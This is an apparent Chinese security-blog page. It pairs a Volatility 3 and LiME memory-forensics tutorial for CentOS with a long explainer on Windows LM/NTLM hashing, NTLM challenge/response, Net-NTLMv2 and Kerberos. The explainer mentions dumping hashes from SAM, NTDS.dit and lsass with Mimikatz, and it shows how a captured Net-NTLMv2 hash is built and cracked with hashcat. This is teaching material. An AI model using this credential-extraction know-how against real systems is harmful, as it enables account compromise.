python3 vol.py -vvvv -f cyq.vmem linux.bash.Bash
python3 vol.py -vvvv -c /pentest/volatility3/volatility3/framework/symbols/linux/Ubuntu1804.json -f cyq.vmem linux.bash.Bash
python3 vol.py -vvvv -s volatility3/framework/symbols/linux/ -f cyq.vmem linux.bash.Bash

以 CentOS7 为例

所使用的工具：
- f8x
- Lime
- Vmware Workstation
- volatility3

配置 centos7 系统并导出内存文件

1
2
3

内存：8G
CPU：2核
硬盘：40G

在 centos 虚机中安装 lime 工具

https://github.com/504ensicsLabs/LiME

安装步骤比较简单，但是有几个坑点。

1
2
3

git clone https://github.com/504ensicsLabs/LiME.git
cd Lime/src
make

make 的时候可能会出现出现一点问题。

这个原因就是系统自身的内核版本和 kernel-devel 安装的内核不匹配，我这台安装的内核为 3.10.0-1160.15.2.el7.x86_64，但是使用 uname -r 查到的内核版本为 3.10.0-957.el7.x86_64，所以使用 yum upgrade 升级内核并重启即可解决。

重新编译会生成一个名字和内核版本相同的. ko 文件。

接下来使用 lime 工具导出内存文件.

`1`	`insmod ./lime-3.10.0-1160.15.2.el7.x86_64.ko "path=/root/centos.lime format=lime"`

“./” 后面输入刚刚生成的 .ko 文件

可以看到文件大小非常接近于8G。

制作 centos 符号表文件

制作 centos 的符号表文件需要用到一个使用 GO 语言编写的程序

https://github.com/volatilityfoundation/dwarf2json

根据项目说明，可以采用四种方式来生成符号表(json文件)。

这里我们就选用第一种。然而，使用第一种的话需要 vmlinux 文件，而这 centos 中原本是没有的，所以需要安装。

`1`	`sudo debuginfo-install kernel`

在安装完成之后可以查找 vmlinux 文件

然后使用 dwarf2json 工具即可导出符号表文件。

kali 分析机 vol3 安装以及使用

打开 kail，使用 f8x 一键安装 volatility3。

https://github.com/ffffffff0x/f8x

安装完毕后，在 /pentest/volatility3 可以找到它。

在 /pentest/volatility3/volatility3/symbols 中创建名为 “linux” 的文件夹，并把符号表放在里面。

把之前导出的 centos.lime 的内存文件也放入 kali 中。

使用 volatility 分析

`1`	`python3 vol.py -f centos.lime linux.bash`

可以看到我在 centos 中所输入的历史命令

linux.check_idt.Check_idt

linux.check_syscall.Check_syscall

linux.elfs.Elfs

linux.lsmod.Lsmod

linux.lsof.Lsof

linux.malfind.Malfind

linux.proc.Maps

linux.pslist.PsList

linux.pstree.PsTree

linux.tty_check.tty_check

文章作者 r0fus0d & Lorna Dane

windows 认证(总结篇)

Mon, 01 Mar 2021 11:08:03 +0800

本文总结关于本地认证、网络认证、域认证的相关知识

info

本文来源于我的笔记项目中,后续有更新内容可见认证.md

本地认证

在 Windows 系统中本机的用户密码以 hash 形式存储在 %SystemRoot%\system32\config\sam 数据库文件中。sam 的简称是Security Account Manager，安全账户管理器。被保存的 hash 分为 LM Hash 和 NTLM hash；微软在 Windows NT 4.0 中引入 SYSKEY 对 SAM 文件加密。而域内用户的密码 Hash 是存在域控的 NTDS.DIT 文件里面。

这个 SAM 文件中保留了计算机本地所有用户的凭证信息，可以理解为是一个数据库。登录系统的时候,系统会自动地读取 SAM 文件中的密码与键入的密码进行比对，如果相同，则认证成功。

操作系统启动之后，SAM 文件将同时被锁定。这意味着操作系统运行之时，用户无法打开或复制 SAM 文件。除了锁定，整个 SAM 文件还经过加密，且不可见。

哈希（hash）

Windows 本身不保存明文密码，只保留密码的 Hash。为了保证存储的不是明文，从而采用 Hash，但是密码 Hash 也需要特定的生成算法以及表现形式。

Hash 就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算，然后返回一个固定长度的字符串。现在已经有了更新的 NTLMv2 以及 Kerberos 验证体系。Windows 加密过的密码口令，我们称之为 hash，Windows 的系统密码 hash 默认情况下一般由两部分组成：第一部分是 LM-hash，第二部分是 NTLM-hash。

LM-Hash

LAN Manager（LM）哈希是 Windows 系统所用的第一种密码哈希算法，是一种较古老的 Hash，在 LAN Manager 协议中使用，非常容易通过暴力破解获取明文凭据。它只有唯一一个版本且一直用到了 NT LAN Manager（NTLM）哈希的出现，在 Windows Vista/Windows 7/Windows Server 2008 以及后面的系统中，LM 哈希算法是默认关闭的，LM 算法是在 DES 基础上实现的，不区分字母大小写，由 IBM 设计。

生成原理

用户的密码转换为大写，密码转换为16进制字符串，不足14字节将会用0来再后面补全。
密码的16进制字符串被分成两个 7byte 部分。每部分转换成比特流，并且长度位 56bit，长度不足用0在左边补齐长度
再分 7bit 为一组,每组末尾加 0，再组成一组
上步骤得到的二组，分别作为 key 为 KGS!@#$% 进行 DES 加密。
将加密后的两组拼接在一起，得到最终 LM HASH 值。

风险

LM 加密算法存在一些固有的漏洞

首先，密码长度最大只能为14个字符
密码不区分大小写。在生成哈希值之前，所有密码都将转换为大写
查看我们的加密过程，就可以看到使用的是分组的 DES，如果密码强度是小于 7 位，那么第二个分组加密后的结果肯定是 aad3b435b51404ee，同理,如果我们看到 lm hash 的结尾是 aad3b435b51404ee，就可以判断密码强度少于7位
一个14个字符的密码分成7 + 7个字符，并且分别为这两个半部分计算哈希值。这种计算哈希值的方式使破解难度成倍增加，因为攻击者需要将7个字符（而不是14个字符）强制暴力破解。这使得14个字符的密码的有效强度等于，或者是7个字符的密码的两倍，该密码的复杂度明显低于 95¹⁴ 14个字符的密码的理论强度。
Des 密码强度不高

NTLM-Hash

NTLM Hash

为了解决 LM 加密和身份验证方案中固有的安全弱点，Microsoft 于 1993 年在 Windows NT 3.1 中引入了 NTLM 协议。

NT LAN Manager（NTLM）哈希是 Windows 系统认可的另一种算法，用于替代古老的 LM-Hash，一般指 Windows 系统下 Security Account Manager（SAM）中保存的用户密码 hash，在 Windows Vista/Windows 7/Windows Server 2008 以及后面的系统中，NTLM 哈希算法是默认启用的。

下面是各个版本对 LM 和 NTLM 的支持。

	2000	XP	2003	Vista	Win7	2008	Win8	2012
LM	✔	✔	✔
NTLM	🔺	🔺	🔺	✔	✔	✔	✔	✔

✔	系统默认使用的加密方式
🔺	当密码超过14位时使用的加密方式

当用户登录时，将用户输入的明文密码加密成 NTLM Hash，与 SAM 数据库文件中的 NTLM Hash 进行比较。

在渗透测试中，通常可从 Windows 系统中的 SAM 文件和域控的 NTDS.dit 文件中获得所有用户的 hash，通过 Mimikatz 读取 lsass.exe 进程能获得已登录用户的 NTLM hash。

生成原理

先将用户密码转换为十六进制格式。
将十六进制格式的密码进行 Unicode 编码。
使用 MD4 摘要算法对 Unicode 编码数据进行 Hash 计算

快速生成

`1`	`python2 -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "P@ssw0rd".encode("utf-16le")).digest())'`

NTLM Hash 与 NTLM 的关系

在 Windows 中，密码 Hash 目前称之为 NTLM Hash，其中 NTLM 全称是：“NT LAN Manager”。

而 NTLM 是一种网络认证协议，与 NTLM Hash 的关系就是：NTLM 网络认证协议是以 NTLM Hash 作为根本凭证进行认证的协议。也就是说，NTLM 与 NTLM Hash 相互对应。

在本地认证的过程中，其实就是将用户输入的密码转换为 NTLM Hash 与 SAM 中的 NTLM Hash 进行比较。

本地认证流程

本地登录时，用户的密码存储在 %SystemRoot%\system32\config\SAM 这个文件里。当用户输入密码进行本地认证的过程中，所有的操作都是在本地进行的。他其实就是将用户输入的密码转换为 NTLM Hash，然后与 SAM 中的 NTLM Hash 进行比较。当用户注销、重启、锁屏后，操作系统会让 winlogon 显示登录界面，也就是输入框。当 winlogon.exe 接收输入后，将密码交给 lsass 进程，这个进程中会存一份明文密码，将明文密码加密成 NTLM Hash，对 SAM 数据库比较认证。

Windows Logon Process(即 winlogon.exe)，是Windows NT 用户登陆程序，用于管理用户登录和退出。
LSASS 用于微软 Windows 系统的安全机制。用于本地安全和登陆策略。

参考如下

`1`	`winlogon.exe -> 接收用户输入 -> lsass.exe -> 认证`

当刚开机、注销等操作后，winlogon.exe 进程会显示一个登录界面要求输入用户名和密码。
输入用户名和密码后，会被 winlogon.exe 获取，然后将其发送给 lsass.exe 进程。
lsass.exe 将明文密码计算得到 NT Hash（不考虑LM）。
之后会将用户名和密码计算得到的 NT Hash 拿到 SAM 数据库去查找比对。

网络认证

在内网渗透中，经常遇到工作组环境，而工作组环境是一个逻辑上的网络环境(工作区)，隶属于工作组的机器之间无法互相建立一个完美的信任机制，只能点对点，是比较落后的认证方式，没有信托机构。

假设 A 主机与 B 主机属于同一个工作组环境，A 想访问 B 主机上的资料，需要将一个存在于 B 主机上的账户凭证发送至 B 主机，经过认证才能够访问 B 主机上的资源。

这是我们接触比较多的 SMB 共享文件的案例，SMB 的默认端口是 445。

早期 SMB 协议在网络上传输明文口令。后来出现 LAN Manager Challenge/Response 验证机制，简称 LM，它很容易被破解，就又有了 NTLM 以及 Kerberos。

LM

LM 与 NTLM 协议的认证机制相同，但是加密算法不同。

目前大多数的 Windows 都采用 NTLM 协议认证，LM 协议已经基本淘汰了。

NTLM

认证的应用

在域环境下，可以使用 Kerberos 或者 NTLM 认证来实现对用户的身份认证。在很多企业的内部网络中(基本都是域环境)，都是使用 Kerberos认证或 NTLM 认证，在 Windows 2000 以后，在域环境下，Kerberos 是默认的认证方式。因为由于 NTLM 认证存在安全风险，所以用 Kerberos 认证的较多。Kerberos 较之 NTLM 更高效、更安全，同时认证过程也相对复杂。在非域环境下，一般都是使用 NTLM 进行认证。SMB 服务和很多 Web 程序都是使用 NTLM 来实现对用户的身份认证。

什么是 NTLM

NTLM 是一种网络认证协议,以 NTLM Hash 作为凭证进行认证。NTLM Hash 长度为32位，由数字和字母组成,采用挑战/响应（Challenge/Response）的消息交换模式，

这个协议只支持 Windows.

NTLM 协议的认证过程分为三步：

协商 : 主要用于确认双方协议版本
质询 : 就是挑战（Challenge）/响应（Response）认证机制起作用的范畴
验证 : 验证主要是在质询完成后，验证结果，是认证的最后一步。

Challenge/Response

客户端需要访问服务器的某个服务(前提是他得知道服务器的用户名和密码)，所以得进行身份认证。于是，客户端输入服务器的用户名和密码进行验证，客户端会缓存服务器密码的 NTLM-Hash 值。客户端发送 TYPE 1 Negotiate 协商消息去协商需要认证的主体，用户(服务器端的用户名)，机器以及需要使用的安全服务等等信息。
服务端接收到客户端发送过来的 TYPE 1 消息，会读取其中的内容，并从中选择出自己所能接受的服务内容，加密等级，安全服务等等。然后传入 NTLM SSP，得到 NTLM_CHALLENGE 消息（被称为 TYPE 2 消息，Challenge 挑战消息），并将此 TYPE 2 消息发回给客户端。此TYPE 2消息中包含了一个由服务端生成的 16 位随机值，此随机值被称为 Challenge，服务器将该 Challenge 保存起来。
客户端收到服务端返回的 TYPE 2 消息，读取出服务端所支持的内容，并取出其中的随机值 Challenge，用缓存的服务器端密码的哈希值 NTLM-Hash 对其进行加密，得到 Net NTLM-Hash(加密后的 Challenge)，并且将 Net NTLM-Hash 封装到 NTLM_AUTH 消息中（被称为 TYPE 3 消息， Authenticate 认证消息），发往服务端。
服务器在收到 Type3 的消息之后，用自己的密码的 NTLM-Hash 对 Challenge 进行加密，并比较自己计算出的 Net NTLM-Hash 认证消息和客户端发送的认证消息是否匹配。如果匹配，则证明客户端掌握了正确的密码，认证成功，否则认证失败。

详细过程

type 1 协商

这个过程是客户端向服务器发送 type 1(协商)消息,它主要包含客户端支持和服务器请求的功能列表。

主要包含以下结构
type 2 质询

这个过程是服务器用 type 2 消息(质询)进行响应，这包含服务器支持和同意的功能列表。但是，最重要的是，它包含服务器产生的 Challenge。

主要包含以下结构

其中最主要的信息是 challenge。后面加密验证依赖于 challenge
type 3 身份验证

这个过程客户端接收到 challenge 之后，使用用户 hash 与 challenge 进行加密运算得到 response，将 response,username,challenge 发给服务器。消息中的 response 是最关键的部分，因为它向服务器证明客户端用户已经知道帐户密码。

主要包含以下结构

这里的 Challeng 不同于 type2 的 Challenge，这里的 Challenge 是一个随机的客户端 nonce。

MIC 是校验和，设计 MIC 主要是为了防止这个包中途被修改

sessionkey 是在要求进行签名的时候用的，用来进行协商加密密钥，可能有些文章会说 sessionkey 就是加密密钥，需要拥有用户 hash 才能计算出来，因此攻击者算不出来，就无法加解密包。但是想想就不可能，这个 session_key 已经在流量里面明文传输，那攻击者拿到之后不就可以直接加解密包了。

注意

Chanllenge 是 Server 产生的一个 16 字节的随机数，每次认证都不同
Response 的表现形式是 Net-NTLM Hash，它是由客户端提供的密码 Hash 加密 Server 返回的 Chanllenge 产生的结果。

NTLMv2

NTLMv1 和 NTLMv2 的加密因素都是 NTLM Hash，而最显著的区别就是 Challenge 和加密算法不同,共同点就是加密的原料都是 NTLM Hash。

Challage： NTLMv1 的 Challenge 有 8 位，NTLMv2 的 Challenge 为 16 位。
Net-NTLM Hash：NTLMv1 的主要加密算法是 DES，NTLMv2 的主要加密算法是 HMAC-MD5。

设置系统使用 LM 还是 NTLM 还是 NTLMv2，需要修改 Local Security Policy 中的 LmCompatibilityLevel 选项

Net-NTLM hash

在 type3 中的响应，有六种类型的响应

LM(LAN Manager)响应 - 由大多数较早的客户端发送，这是“原始”响应类型。
NTLM v1 响应 - 这是由基于 NT 的客户端发送的，包括 Windows 2000 和 XP。
NTLMv2 响应 - 在 Windows NT Service Pack 4 中引入的一种较新的响应类型。它替换启用了 NTLM 版本 2 的系统上的 NTLM 响应。
LMv2 响应 - 替代 NTLM 版本 2 系统上的 LM 响应。
NTLM2 会话响应 - 用于在没有 NTLMv2 身份验证的情况下协商 NTLM2 会话安全性时，此方案会更改 LM NTLM 响应的语义。
匿名响应 - 当匿名上下文正在建立时使用; 没有提供实际的证书，也没有真正的身份验证。“存根”字段显示在类型 3 消息中。

这六种使用的加密流程一样，都是 Challenge/Response 验证机制,区别在 Challenge 和加密算法不同。

在以上流程中，登录用户的密码 hash 即 NTLM hash，其中，经过 NTLM Hash 加密 Challenge 的结果在网络协议中称之为 Net NTLM Hash，response 中包含 Net-NTLM hash.

在 NTLM 认证中，NTLM 响应分为 NTLM v1，NTLMv2，NTLM session v2 三种协议，不同协议使用不同格式的 Challenge 和加密算法.所以也就存在不同协议的 Net-NTLM hash，即 Net-NTLM v1 hash，Net-NTLM v2 hash

Net-NTLM v1 hash

v1 是将 16字节的 NTLM hash 空填充为 21 个字节，然后分成三组，每组7比特，作为 3DES 加密算法的三组密钥，加密 Server 发来的 Challenge。将这三个密文值连接起来得到 response。

Net-NTLM v2 hash

v2 将 Unicode 后的大写用户名与 Unicode 后的身份验证目标（在 Type 3 消息的”TargetName”字段中指定的域或服务器名称）拼在一起。请注意，用户名将转换为大写，而身份验证目标区分大小写，并且必须与“TargetName”字段中显示的大小写匹配。使用 16 字节 NTLM 哈希作为密钥，得到一个值。

建一个 blob 信息

使用 16 字节 NTLMv2 哈希作为密钥，将 HMAC-MD5 消息认证代码算法加密一个值(来自 type 2 的 Challenge 与 Blob 拼接在一起)。得到一个 16 字节的 NTProofStr。

将 NTProofStr 与 Blob 拼接起来形成得到 response。至于选择哪个版本的响应由 LmCompatibilityLevel 决定。

Challenge/Response 验证机制里面 type3 response 里面包含 Net-ntlm hash，NTLM v1 响应和 NTLMv2 响应对应的就是 Net-ntlm hash 分为 Net-ntlm hash v1 和 Net-ntlm hash v2。

Net-ntlm hash v1 的格式为：

username::hostname:LM response:NTLM response:challenge

Net-ntlm hash v2 的格式为：

username::domain:challenge:HMAC-MD5:blob

下面演示从 response 里面提取 NTLMv2

这里的 challenge 是 type2 服务器返回的 challenge 不是 type3 流量包里面的 client Challenge

就是 18f77b6fe9f8d876

HMAC-MD5 对应数据包中的 NTProofSt : 0ecfccd87d3bdb81713dc8c07e6705b6

blob 就是 response 减去 NTProofStr。(因为在计算 response 的时候，response 就是由 NTProofStr 加上 blob)

username（要访问服务器的用户名）：Administrator
domain（访问者主机名或者 ip）：DESKTOP-QKM4NK7
challenge（数据包 2 中服务器返回的 challenge 值）：18f77b6fe9f8d876
HMAC-MD5（数据包 3 中的 NTProofStr）: 0ecfccd87d3bdb81713dc8c07e6705b6
blob（blob 对应数据为 NTLMv2 Response 开头去掉 NTProofStr 的后半部分）：01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000

所以最后，Net-NTLM v2 Hash 值为：

Administrator::DESKTOP-QKM4NK7:18f77b6fe9f8d876:0ecfccd87d3bdb81713dc8c07e6705b6:01010000000000002a470d3bc233d6017eb1f527b5e7bd4d0000000002001e00570049004e002d0041003500470050004400430050004a0037004f00540001001e00570049004e002d0041003500470050004400430050004a0037004f00540004001e00570049004e002d0041003500470050004400430050004a0037004f00540003001e00570049004e002d0041003500470050004400430050004a0037004f005400070008002a470d3bc233d601060004000200000008003000300000000000000001000000002000003737fbe7dbcbd2c8e5d7a030f44586c91423d9c5202f827f3f6cf26f69adbfe80a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100340031002e003100330039000000000000000000

上面的 Net-NTLM v2 Hash 值若使用 hashcat 爆破应为 Abcd1234

抓包过程见 Wireshark笔记案例中 NTLMv2 部分

域环境中NTLM认证方式

用户通过输入 Windows 帐号和密码登录客户端主机，客户端会缓存密码的哈希值 NTLM-Hash。成功登录客户端的用户如果试图访问服务器资源，需要向对方发送一个请求，该请求利用 NTLM SSP 生成 NTLM_NEGOTIATE 消息（被称为 TYPE 1 消息，Negotiate 协商消息），并将 TYPE 1 消息发送给服务端中，该 TYPE 1 消息中包含一个以明文表示的用户名以及其他的一些协商信息(认证的主体，机器以及需要使用的安全服务等等信息)
服务端接收到客户端发送过来的 TYPE 1 消息，会读取其中的内容，并从中选择出自己所能接受的服务内容，加密等级，安全服务等等。然后传入 NTLM SSP，得到 NTLM_CHALLENGE 消息（被称为 TYPE 2 消息，Challenge 挑战消息），并将此 TYPE 2 消息发回给客户端。此 TYPE 2 消息中包含了一个由服务端生成的16位随机值，此随机值被称为 Challenge，服务器将该 Challenge 保存起来。
客户端收到服务端返回的 TYPE 2 消息，读取出服务端所支持的内容，并取出其中的随机值 Challenge，用缓存的密码的哈希值 NTLM-Hash 对其进行加密，得到 Net NTLM-Hash(加密后的 Challenge)，并且将 Net NTLM-Hash 封装到 NTLM_AUTH 消息中（被称为 TYPE 3 消息， Authenticate认证消息），发往服务端。
服务器接收到客户端发送来的 NTLM_AUTH 的 TYPE 3 消息后，取出其中的 Net NTLM-Hash 值，并向 DC 域控（Domain Control）发送针对客户端的验证请求。该请求主要包含以下三方面的内容：客户端用户名、原始的 Challenge 和加密后的 Challenge(也就是 Net NTLM-Hash)。
DC 根据用户名获取该帐号的密码哈希值 NTLM-Hash，用密码哈希值 NTLM-Hash 对原始的 Challenge 进行加密得到 Net NTLM-Hash。如果加密后的 Challenge 和服务器发送的一致，则意味着用户拥有正确的密码，验证通过，否则验证失败。DC 将验证结果发给服务器。
服务器根据 DC 返回的结果，对客户端进行回复。

抓包过程见 Wireshark笔记案例中域环境中NTLM认证方式部分

SSP & SSPI

SSPI(Security Support Provider Interface)

这是 Windows 定义的一套接口，此接口定义了与安全有关的功能函数，用来获得验证、信息完整性、信息隐私等安全功能，就是定义了一套接口函数用来身份验证，签名等，但是没有具体的实现。

SSP(Security Support Provider)

SSPI 的实现者，对 SSPI 相关功能函数的具体实现。微软自己实现了如下的 SSP，用于提供安全功能：

NTLM SSP
Kerberos
Cred SSP
Digest SSP
Negotiate SSP
Schannel SSP
Negotiate Extensions SSP
PKU2U SSP

在系统层面，SSP 就是一个 dll，来实现身份验证等安全功能.不同的 SSP，实现的身份验证机制是不一样的。比如 NTLM SSP 实现的就是一种 Challenge/Response 验证机制。而 Kerberos 实现的就是基于 ticket 的身份验证机制。我们可以编写自己的 SSP，然后注册到操作系统中，让操作系统支持更多的自定义的身份验证方法。

我们抓包分析 ntlm 的时候，就会看到 ntlm 是放在 GSS-API 里面

为啥这里会出现 GSSAPI 呢，SSPI 是 GSSAPI 的一个专有变体，进行了扩展并具有许多特定于 Windows 的数据类型。SSPI 生成和接受的令牌大多与 GSS-API 兼容。所以这里出现 GSSAPI 只是为了兼容，我们可以不必理会。可以直接从 NTLM SSP 开始看起。注册为 SSP 的一个好处就是，SSP 实现了了与安全有关的功能函数，那上层协议(比如 SMB)在进行身份认证等功能的时候，就可以不用考虑协议细节，只需要调用相关的函数即可。而认证过程中的流量嵌入在上层协议里面。不像 kerbreos，既可以镶嵌在上层协议里面，也可以作为独立的应用层协议。ntlm 是只能镶嵌在上层协议里面，消息的传输依赖于使用 ntlm 的上层协议。比如镶嵌在 SMB 协议里,或镶嵌在 HTTP 协议。

域认证

域认证部分内容来自 ^{[浅学Windows认证]}^、^{[彻底理解Windows认证 - 议题解读]}

Kerberos

Kerberos 协议

Kerberos 是一种计算机网络授权协议，用来在非安全网络中，对个人通信以安全的手段进行身份认证。软件设计上采用客户端/服务器结构，并且能够进行相互认证，即客户端和服务器端均可对对方进行身份认证。可以用于防止窃听、防止重放攻击、保护数据完整性等场合，是一种应用对称密钥体制进行密钥管理的系统。支持 SSO。Kerberos 的扩展产品也使用公开密钥加密方法进行认证。

当有 N 个人使用该系统时，为确保在任意两个人之间进行秘密对话，系统至少保存有它与每个人的共享密钥，所需的最少会话密钥数为 N 个。

Kerberos 协议基于对称密码学，并需要一个值得信赖的第三方。Kerberos 协议的扩展可以为认证的某些阶段提供公钥密码学支持。

简要概括认证过程

Kerberos 认证用于域环境中，它是一种基于票据（Ticket）的认证方式。该认证过程的实现不依赖于主机操作系统的认证，无需基于主机地址的信任，不要求网络上所有主机的物理安全，并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下， Kerberos 作为一种可信任的第三方认证服务，是通过传统的密码技术(如:共享密钥)执行认证服务的。

客户端要访问服务器的资源，需要首先购买服务端认可的 ST 服务票据。也就是说，客户端在访问服务器之前需要预先买好票，等待服务验票之后才能入场。但是这张票不能直接购买，需要一张 TGT 认购权证(Ticket Granting Ticket)。也就是说，客户端在买票之前必须先获得一张 TGT 认购权证。这张 TGT 认购权证和 ST 服务票据均由 KDC 发售。

他的整个认证过程涉及到三方：客户端、服务端和 KDC（Key Distribution Center）。在 Windows 域环境中，由 DC(域控)来作为 KDC。

Kerberos 认证过程如下:

client 向 kerberos 服务请求，希望获取访问 server 的权限。 kerberos 得到了这个消息，首先得判断 client 是否是可信赖的，也就是白名单黑名单的说法。这就是 AS 服务完成的工作，通过在 AD 中存储黑名单和白名单来区分 client。成功后，返回 AS 返回 TGT 给 client。
client 得到了 TGT 后，继续向 kerberos 请求，希望获取访问 server 的权限。kerberos 又得到了这个消息，这时候通过 client 消息中的 TGT，判断出了 client 拥有了这个权限，给了 client 访问 server 的权限 ticket。
client 得到 ticket 后，终于可以成功访问 server。这个 ticket 只是针对这个 server，其他 server 需要向 TGS 申请。

Kerberos 认证所参与的角色

访问服务的 Client
提供服务的 Server
KDC(Key Distribution Center,密钥分发中心) = DC(Domain Controller)

其中 KDC 服务默认安装在一个域的域控中，而 Client 和 Server 为域内的用户或者是服务，如 HTTP 服务、SQL 服务。在 Kerberos 中 Client 是否有权限访问 Server 端的服务由 KDC 发放的票据来决定

认证中涉及到的部分词汇

Authentication Server : 为 Client 生成 TGT 的服务。 AS 的作用是验证 Client 端的身份，验证通过就会给一个 TGT 票据给 Client
AD(Account Database) : 活动目录,存储所有 Client 白名单，只有存在于白名单的 Client 才能申请到 AS 给的 TGT，类似于本机 SAM,在 DC 上
DC(Domain Controller) : 域控
KDC(Key Distribution Center) : 密钥分发中心，由域控担任
KAS(Kerberos Authentication Service) : Kerberos 认证服务
TGT(Ticket Granting Ticket) : 入场券，通过入场券能够获得票据，是一种临时凭证的存在
TGS(Ticket Granting Server) : 为 client 生成某个服务的 ticket。 TGS 的作用是通过 AS 发送给 Client 的 TGT 换取访问 Server 端的 ST 票据。ST 也有资料称为 TGS Ticket，为了和 TGS 区分，此处使用 ST
ST(Ticket) : 票据,是网络对象互相访问的凭证。
Session Key : 会话密钥，只有 Client 和 TGS 知道
krbtgt 账户：每个域控制器都有一个 krbtgt 的用户，是 KDC 的服务账户，用来创建票据授予服务（TGS）加密的密钥。

获得认购权证

首先，我们来看看客户端如何获得 TGT 认购权证。TGT 是 KDC 的 KAS 认证服务（Kerberos Authentication Service）发放的。

当某个用户通过输入域帐号和密码试图登录某台主机的时候，本机的 Kerberos 服务会向 KDC 的 KAS 认证服务发送一个认证请求。该请求主要包括两部分内容，明文形式的用户名和用用户秘钥加密原始 Authenticator 后得到的加密后 Authenticator(Authenticator 是客户端和服务端可以用于验证对方身份的一个东西)。
当 KDC 接收到请求之后，通过 AD 查询该用户名得到该用户的信息。通过查询得到的密码信息对 Authenticator 进行解密得到原始的 Authenticator。如果解密后的 Authenticator 和已知的 Authenticator 一致，则证明请求者提供的密码正确，即确定了登录者的真实身份。KAS 成功认证对方的身份之后，会先生成一个用用户密码加密后的用于确保该用户和 KDC 之间通信安全的 Logon Session Key 会话秘钥。KAS 接着为该用户创建 TGT 认购权证。TGT 主要包含两方面的内容：用户相关信息和原始 Logon Session Key，而整个 TGT 则通过 KDC 自己的密钥进行加密。最终，被不同密钥加密的 Logon Session Key 和 TGT 返回给客户端。

获得 ST 服务票据

经过上面的步骤，客户端获取了进入同域中其他主机入场券的 TGT 认购权证和 Logon Session Key，然后用自己的密钥解密 Logon Session Key 得到原始的 Logon Session Key。然后它会在本地缓存此 TGT 和原始 Logon Session Key。如果现在它需要访问某台服务器的资源，它就需要凭借这张 TGT 认购凭证向 KDC 购买相应的入场券。这里的入场券也有一个专有的名称——ST 服务票据（Service Ticket）。具体来说，ST 是通过 KDC 的另一个服务 TGS（Ticket Granting Service）出售的。

客户端先向 TGS 发送一个 ST 购买请求，该请求主要包含如下的内容：客户端用户名、通过 Logon Session Key 加密的 Authenticator、TGT 和访问的服务器名(其实是服务)。
TGS 接收到请求之后，通过自己的秘钥解密 TGT 并得到原始 Logon Session Key，然后通过 Logon Session Key 解密 Authenticator，进而验证了对方的真实身份。TGS 完成对客户端的认证之后，会生成一个用 Logon Session Key 加密后的用于确保客户端-服务器之间通信安全的 Service Session Key 会话秘钥。然后为该客户端生成 ST 服务票据。ST 服务票据主要包含两方面的内容：客户端用户信息和原始 Service Session Key，整个 ST 通过服务器密码派生的秘钥进行加密。最终两个被加密的 Service Session Key 和 ST 回复给客户端。

用 ST 服务票据双向认证

客户端接收到 TGS 回复后，通过缓存的 Logon Session Key 解密得到原始 Service Session Key，同时它也得到了进入服务器 ST 服务票据。该 Serivce Session Key 和 ST 服务票据 会被客户端缓存。客户端访问某服务器资源，将 ST 服务票据 和 Service Session Key 加密的 Authenticator 发送给服务端。
服务器收到客户端发来的 ST 服务票据。但是，服务端如何确保客户端发来的 ST 服务票据 是通过 TGS 购买，而不是自己伪造的呢？这很好办，不要忘了 ST 是通过服务器自己密码派生的秘钥进行加密的。具体的操作过程是这样的，服务器在接收到请求之后，先通过自己密码派生的秘钥解密 ST，并从中提取 Service Session Key。然后通过提取出来的 Service Session Key 解密 Authenticator，进而验证了客户端的真实身份。实际上，到目前为止，服务端已经完成了对客户端的验证，但是，整个认证过程还没有结束。谈到认证，很多人都认为只是服务器对客户端的认证，实际上在大部分场合，我们需要的是双向验证（Mutual Authentication），即访问者和被访问者互相验证对方的身份。现在服务器已经可以确保客户端是它所声称的那么用户，客户端还没有确认它所访问的不是一个钓鱼服务呢。为了解决客户端对服务器的验证，服务端需要将解密后的 Authenticator 再次用 Service Session Key 进行加密，并发挥给客户端。客户端再用缓存的 Service Session Key 进行解密，如果和之前的内容完全一样，则可以证明自己正在访问的服务器和自己拥有相同的 Service Session Key。双向认证过后，开始了服务资源的访问。

详细概括认证过程

当 Client 想要访问 Server 上的某个服务时，需要先向 AS 证明自己的身份，然后通过 AS 发放的 TGT 向 Server 发起认证请求，这个过程分为三块：

The Authentication Service Exchange： Client 与 AS 的交互
- AS_REQ
- AS_REP
The Ticket-Granting Service (TGS) Exchange： Client 与 TGS 的交互
- TGS_REQ
- TGS_REP
The Client/Server Authentication Exchange： Client 与 Server 的交互
- AP_REQ
- AP_REP

整体过程如图

用户登录

用户登录阶段，通常由用户(AA)输入[用户名][密码]信息，在客户端侧，用户输入的密码信息被一个单向 Hash 函数生成 Client 密钥，即 AA 的 NTLM Hash：
请求身份认证
- 客户端向 AS 发送请求认证
  
  KRB-AS-REQ：Client 发送明文 用户名 AA 和 Authenticator1 信息到 KDC （Key Distribution Center）。Authenticator1 的内容为使用 Client 密码哈希加密的时间戳、Client ID、网络类型、加密类型等。
- AS 确认客户端登陆者身份
  
  KRB-AS-REP：AS 收到用户认证请求后，AS 根据请求中的 用户名 AA 信息，从数据库中查找用户名是否存在。如果 用户名 AA 存在，则从 KDC 中可以获取 用户 AA 的密码，使用单向函数为该密码生成一个 Client 密钥（即NTLM Hash）。
  
  AS 生成随机字符串 Client/TGS Session Key，使用 Client 密钥(用户 AA 的密码 NTLM Hash)对 Client/TGS Session Key 加密得到 sessionkey_as；
  
  再使用 TGS 密钥(krbtgt 用户的 NTLM Hash)对 Client/TGS Session Key 、 Client Info 和 Timestamp 加密,得到 TGT（TGT票据）。
  
  将 sessionkey_as 和 TGT 一起返回给 Client。
  
  Client 收到 AS 的响应消息后，利用自身的 Client 密钥（AA 的 NTLM Hash）对 sessionkey_as 解密，这样就获取到 Client/TGS Session Key。
  - AS 的响应消息中有一条是属于 Client 的，有一条是 TGS 的。
  - TGT 的到期时间为 8 小时，如果超过了 8 小时，还需要重新申请 TGT，不能之间进入下一步获取 Ticket。
